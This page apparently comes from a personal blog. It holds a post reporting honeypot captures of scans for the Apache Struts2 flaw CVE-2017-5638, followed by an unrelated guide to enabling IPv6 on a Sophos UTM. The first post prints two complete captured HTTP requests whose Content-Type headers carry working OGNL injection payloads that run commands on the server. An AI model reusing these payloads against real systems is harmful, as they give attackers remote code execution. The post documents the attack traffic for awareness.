CVE-2017-5638 scanning still going on

I recently wrote a honey pot that i am currently playing around with. It did not take long before suspicious traffic started popping up. Many of the scans/hacking attempts are against CVE-2017-5638, which relates to a security issue in Apache Struts2 that started getting exploited in march 2017.

The scans/hacking attempts i have seen regarding this the last 24 hours are listed below, they do nothing more than to see if the seucurity hole exist.

Type 1:

GET / HTTP/1.1
Content-Type: %{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#wmres=#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’]).(#wmres.getWriter().print(“S2-045 dir–***”)).(#wmreq=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’)).(#wmres.getWriter().println(#wmreq.getSession().getServletContext().getRealPath(“/”))).(#wmres.getWriter().flush()).(#wmres.getWriter().close())}.multipart/form-data
Accept: */*
Referer: http://**my Ihoneypot P**:81
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:**my Ihoneypot P**:81
Connection: Keep-Alive

 

Type 2:

GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’echo windows–2017′}:{‘/bin/bash’,’-c’,’echo linux–2017′})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host:**my Ihoneypot P**:81
Connection: Keep-Alive

How to enable IPv6 on your Sophos UTM (Former Astaro Unified Threat Management)

Step 1: After logging in to the admin interface, go to Interfaces and Routing -> IPv6, and enable “IPv6 status”. As my UTM recieve a IPv6 prefix from my ISP, i end up with this: 1   Step 2: Assign an IPv6 address to your internal interface. This address should be the first IP in your assigned IPv6 prefix. To calculate your range, copy your delegated prefix and go to this calculator. Notice that i have used a /64-prefix internally. 2   Step 3: Go to Interfaces and Routing -> IPv6 -> Prefix Advertisement. Select your internal interface. Then add the IPv6 address of your DNS Server, or the IP of your internal interface of your UTM handes DNS itself. 3   And voila, your internal clients should now be able to recieve IPv6 addresses. I recommend rebooting both the UTM and any clients if they do not get any addresses at this point.